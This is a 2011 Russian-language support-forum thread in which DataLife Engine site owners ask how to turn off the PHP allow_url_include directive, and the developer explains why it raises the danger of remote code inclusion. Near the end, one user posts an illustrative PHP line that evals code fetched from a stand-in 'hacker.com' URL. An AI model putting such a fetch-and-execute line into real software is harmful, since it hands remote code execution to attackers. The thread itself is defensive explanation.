Alinokk 0 Опубликовано: 19 мая 2011 Рассказать Опубликовано: 19 мая 2011 После обновления движка на версию 9.3. возникла ошибка: Внимание ошибка безопасности: Ваш сервер не отвечает минимальным требованиям безопасности, на сервере включена директива allow_url_include, для отключения данной директивы обратитесь к вашему хостинг провайдеру. ---------- Написал провайдеру, он ответил: Здравствуйте! Изменять настройки php для Вашего сайта Вы можете через директивы php_value и php_flag в файле .htaccess. --------- А я в этом не разбираюсь - что делать? ----------- Мой сайт Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 094 Опубликовано: 19 мая 2011 Рассказать Опубликовано: 19 мая 2011 В самое начало пропишите строчку php_value allow_url_include off Цитата Ссылка на сообщение Поделиться на других сайтах
Alinokk 0 Опубликовано: 19 мая 2011 Рассказать Опубликовано: 19 мая 2011 Автор В самое начало пропишите строчку php_value allow_url_include off Это в файле .htaccess в корне??? Цитата Ссылка на сообщение Поделиться на других сайтах
Lomot 134 Опубликовано: 19 мая 2011 Рассказать Опубликовано: 19 мая 2011 Это в файле .htaccess в корне??? да Цитата Ссылка на сообщение Поделиться на других сайтах
Alinokk 0 Опубликовано: 20 мая 2011 Рассказать Опубликовано: 20 мая 2011 Автор Это в файле .htaccess в корне??? да Вставила, результата нету. Что ещё нужно сделать? Цитата Ссылка на сообщение Поделиться на других сайтах
Captain 625 Опубликовано: 20 мая 2011 Рассказать Опубликовано: 20 мая 2011 Вставила, результата нету. Что ещё нужно сделать? Обратитесь в ТП вашего хостинг провайдера. Цитата Ссылка на сообщение Поделиться на других сайтах
grafee 0 Опубликовано: 25 мая 2011 Рассказать Опубликовано: 25 мая 2011 У меня аналогичная проблема и нетолько: 1. Внимание ошибка безопасности: Ваш сервер не отвечает минимальным требованиям безопасности, на сервере включена директива allow_url_include, для отключения данной директивы обратитесь к вашему хостинг провайдеру. 2. Внимание: На вашем сервере обнаружены устаревшие настройки в php.ini, а именно включен magic_quotes_gpc, данная настройка является не рекомендуемой при использовании DataLife Engine. Обратитесь к вашему хостинг провайдеру для отключения данной настройки в настройках сервера. --------------- ОТвет провайдера аналогичен: Вы свободно можете изменять эти параметры через директивы php_value и php_flag в файле .htaccess . ---------------------------- Использовал : php_value allow_url_include off - не помогло. Провайдер менять не хочет. Зовут МАстерхост. Дайте рекомендации пожалуйста кто нибудь по моим 2-м пунктам. ---------------- P.S. Администрация переведите пожалуйста мой аккаунт в соответствующую группу, у меня расширеная лицензия на скрипт. Или скажите куда кликнуть. Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 094 Опубликовано: 25 мая 2011 Рассказать Опубликовано: 25 мая 2011 Использовал : php_value allow_url_include off - не помогло. Провайдер менять не хочет. Зовут МАстерхост. попробуйте вместо off использовать 0 т.е. php_value allow_url_include 0P.S. Администрация переведите пожалуйста мой аккаунт в соответствующую группу, у меня расширеная лицензия на скрипт. Или скажите куда кликнуть. http://forum.dle-news.ru/index.php?showtopic=56000 Цитата Ссылка на сообщение Поделиться на других сайтах
grafee 0 Опубликовано: 25 мая 2011 Рассказать Опубликовано: 25 мая 2011 Не помогло... кукис обновил в т.ч. пишет красным по белому ... ругается ДЛЕ. Инет перерыл.. везде написано как это ужасно или ведутся споры, что не существенно ... а вот решение проблемы никто толком не указывает. А по второму пункту я нашел на форуме тут ... помогло .. завтра с провайдером буду бадаться... P.S. Спасибо, заявку отправил. Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 094 Опубликовано: 25 мая 2011 Рассказать Опубликовано: 25 мая 2011 Не помогло... В таком случае вам поможет только хостинг провайдер, пусть проверяют почему не работает, если они пишут что вам разрешено менять этот параметр PHP в .htaccess Вообще этот параметр касается общей безопасности вашего сервера. Непосредственно самому DLE неважно включен или выключен этот параметр. Это рекомендация относительно вашей безопасности в случае попадания на сервер других сторонних скриптов. Цитата Ссылка на сообщение Поделиться на других сайтах
grafee 0 Опубликовано: 26 мая 2011 Рассказать Опубликовано: 26 мая 2011 (изменено) Итак... немного порычав в очередной раз мне пришло письмо от Хостера: Здравствуйте! Вы можете использовать PHP-CGI: * http://masterhost.ru/support/doc/php/#reconfig Достаточно скопировать нашу версию PHP-CGI и в php.ini изменить allow_url_include = On на allow_url_include = Off ---------------- Т.е. в предыдущий раз они мне писали что htacces надо менять ... теперь описав свои изменения директив... поняв что и действительно не работает, отписали по другому. Вот сейчас сижу и осмысливаю всё что там написано в * http://masterhost.ru/support/doc/php/#reconfig. Возможно кому нибудь это тоже поможет. Дальнейшие свои действия буду описывать... чуствую себя чайником. Потихоньку думаю сделаю. Изменено 26 мая 2011 пользователем grafee Цитата Ссылка на сообщение Поделиться на других сайтах
Adobe 111 Опубликовано: 26 мая 2011 Рассказать Опубликовано: 26 мая 2011 Аналогичная проблема была. hoster.ru хостинг Звонил в техподдержку, сказали мол у анс такие настройки и его через htaccess нельзя менять, вобщем побрили Цитата Ссылка на сообщение Поделиться на других сайтах
IgorA100 90 Опубликовано: 27 мая 2011 Рассказать Опубликовано: 27 мая 2011 Вот сейчас сижу и осмысливаю всё что там написано в * http://masterhost.ru/support/doc/php/#reconfig. Возможно кому нибудь это тоже поможет. Дальнейшие свои действия буду описывать... чуствую себя чайником. Потихоньку думаю сделаю. Я так понимаю, что у Вас выделенный виртуальный сервер. Если да - нужно клиентом зайти по SSH и править файл настроек php.ini. Данные настройки будут применены ко всему виртуальному серверу. Цитата Ссылка на сообщение Поделиться на других сайтах
Plextor 0 Опубликовано: 29 мая 2011 Рассказать Опубликовано: 29 мая 2011 Кто работает с 1Gb хостингом, подскажите как решить данную проблему? Тех поддержка хостинга писала что то о "переводе сервера на cgi / fastcgi". Но к сожалению ничего непонятно... Цитата Ссылка на сообщение Поделиться на других сайтах
total08 0 Опубликовано: 30 мая 2011 Рассказать Опубликовано: 30 мая 2011 Такая же ошибка. В версии 9,2 исправил при помощи директивы RewriteBase и php_flag allow_url_include Off но в 9,3 не помогает Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 094 Опубликовано: 30 мая 2011 Рассказать Опубликовано: 30 мая 2011 В версии 9,2 исправил при помощи директивы RewriteBase и php_flag allow_url_include Off но в 9,3 не помогает Не придумавайте того чего не было и быть не могло. Версия 9.2 данной проверки не проводила и выводить данное сообщение не могла в принципе, соответвенно и исправлять с помощью директив вы это также не могли.Вообще сообщение о данной проблеме скрипт выводит во вполне очевидным текстом. Настройки вашего сервера, представляют угрозу для безопасной работы сайтов. Эта серверная настройка и обращаться для ее исправления нужно к хостинг провайдеру. DLE вообще все равно включена эта настройка или нет, на его работу это никак не влияет, ему все равно. Он лишь вас уведомляет, что хостинг не уделяет должного внимания настройкам безопасности сервера. И решать этот вопрос вам нужно с вашим хостинг провайдером, DLE это отключить не может, да и не для него эта настройка. Цитата Ссылка на сообщение Поделиться на других сайтах
Scorpio2011 2 Опубликовано: 31 мая 2011 Рассказать Опубликовано: 31 мая 2011 (изменено) У меня та же беда! Поддержка исправила настроики. Через функцию phpinfo() allow_url_include=Off вот что у меня, тоесть отключена эта функция. Плюс я php_value allow_url_include off добавил в .htaccess, а толку ноль, как вылазила так и вылазиет это сообщение. Изменено 31 мая 2011 пользователем Scorpio2011 Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 094 Опубликовано: 31 мая 2011 Рассказать Опубликовано: 31 мая 2011 Scorpio2011, скрипт получает эти значения через ini_get от сервера. Предоставляйте доступ по FTP, проверим что у вас возращает сервер в данной функции Цитата Ссылка на сообщение Поделиться на других сайтах
grafee 0 Опубликовано: 31 мая 2011 Рассказать Опубликовано: 31 мая 2011 Вот сейчас сижу и осмысливаю всё что там написано в * http://masterhost.ru/support/doc/php/#reconfig. Возможно кому нибудь это тоже поможет. Дальнейшие свои действия буду описывать... чуствую себя чайником. Потихоньку думаю сделаю. Я так понимаю, что у Вас выделенный виртуальный сервер. Если да - нужно клиентом зайти по SSH и править файл настроек php.ini. Данные настройки будут применены ко всему виртуальному серверу. Всё именно так. Я с админом одним разговаривал, он сказал проблем как бы никаких.. через SSH зайти и проч. НО !!! тут штука немного другая описывается, провайдер предлагает создать свой интерпритатор PHP входя через SSH. Там всё что он напсал по этому поводу впринципе понятно, времени нет пока этим заняться - работа. Раскрутку сайта не запускал .. посещений пока нет особо, сейчас пока наполню, потом ошибку хоста эту исправлю, потом раскрутка... но всё во времени упирается. Отпишу потом. Цитата Ссылка на сообщение Поделиться на других сайтах
n0lik 75 Опубликовано: 5 июня 2011 Рассказать Опубликовано: 5 июня 2011 (изменено) celsoft, Мне хостер написал:К сожалению, allow_url_include отключить невозможно. Чем это мне грозит? Чего можно ожидать и как обезопасить сайт? Изменено 5 июня 2011 пользователем n0lik Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 094 Опубликовано: 5 июня 2011 Рассказать Опубликовано: 5 июня 2011 n0lik, Непосредственно самому DLE абсолютно все равно включена или отключена данная директива, на его функциональность это никак не влияет. Но когда включена данная директива, то для того чтобы запустить сторонний зловредный код, его необязательно загружать именно на ваш сервер, его можно будет запустить когда он находится на любом другом сервере и сайте. Т.е. например если будет найдена какая либо уязвимость в скрипте или сторонних модификациях или сторонних скриптах на вашем сайте, то опасность от той или иной уязвимости увеличивается в разы. Обезопасить себя можно только отключением данной директивы, и других вариантов нет, т.к. данная директива это не какая то конкретная уязвимость, это общая небезопасная настройка сервера. Для примера: Вот почти год назад была обнаружена уязвимость в DLE http://dle-news.ru/bags/v90/1127-nedostatochnaya-filtraciya-vhodyaschih-dannyh.html так вот как видите она имеет статус очень опасной, при этом если на сервере отключена директива register_globals то эта уязвимость была абсолютно безопасна для сайта, и воспользоваться ей было бы невозможно, даже если не ставить патч и что либо исправлять.Есть ряд настроек сервера кторые небезопасны и существуют они только для того чтобы выполнять очень специфические задачи и включать которые для общих серверов и всех сайтов нельзя, к таким настройкам и относиться также allow_url_include Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 5 июня 2011 Рассказать Опубликовано: 5 июня 2011 n0lik, Вот написал тебе три примера, как получить содержимое файла: <?php // Первый способ. $a = file ( "http://ya.ru/" ); print_r ( $a ); // // Второй способ. $b = fopen ( "http://ya.ru/", "r" ); echo fgets ( $b, 20480 ); // // Третий способ. $c = file_get_contents ( "http://ya.ru/" ); echo $c; // ?> [/php] Для всех этих способов в php.ini должно быть включено [b]allow_url_fopen[/b]. Для DLE включение [b]allow_url_fopen[/b] надо лишь для того, чтобы через админку проверять наличие новых версий. Файл: upload\engine\ajax\updates.php Строчка: $data = @file_get_contents("http://www.dle-news.ru/extras/updates.php?version_id=".$_REQUEST['versionid']."&key=".$config['key']); Если тебе это не надо, то [b]лучше отключать allow_url_fopen[/b]. А узнать о новых версиях DLE можно с RSS по каналам: http://dle-news.ru/bags/rss.xml, http://dle-news.ru/release/rss.xml Цитата Ссылка на сообщение Поделиться на других сайтах
n0lik 75 Опубликовано: 5 июня 2011 Рассказать Опубликовано: 5 июня 2011 celsoft, Спасибо за ответ. WWW.ZEOS.IN, Как и всегда, я вас не понял про что вы Вот если бы вы мне написали как вдолбить хостеру об отключении allow_url_include, было бы замечательно Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 5 июня 2011 Рассказать Опубликовано: 5 июня 2011 (изменено) <?php eval ( file_get_contents ( "http://hacker.com/сторонний_зловредный_код.txt" ) ); ?>[/php] Так понятнее? Изменено 5 июня 2011 пользователем WWW.ZEOS.IN Цитата Ссылка на сообщение Поделиться на других сайтах
n0lik 75 Опубликовано: 5 июня 2011 Рассказать Опубликовано: 5 июня 2011 WWW.ZEOS.IN, Не капельки, я в пхп не соображаю и сей код мне ни очём не говорит, я же говорю, ты лучше напиши, что мне сказать хостеру (как убедить), что бы он отключил allow_url_include. Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.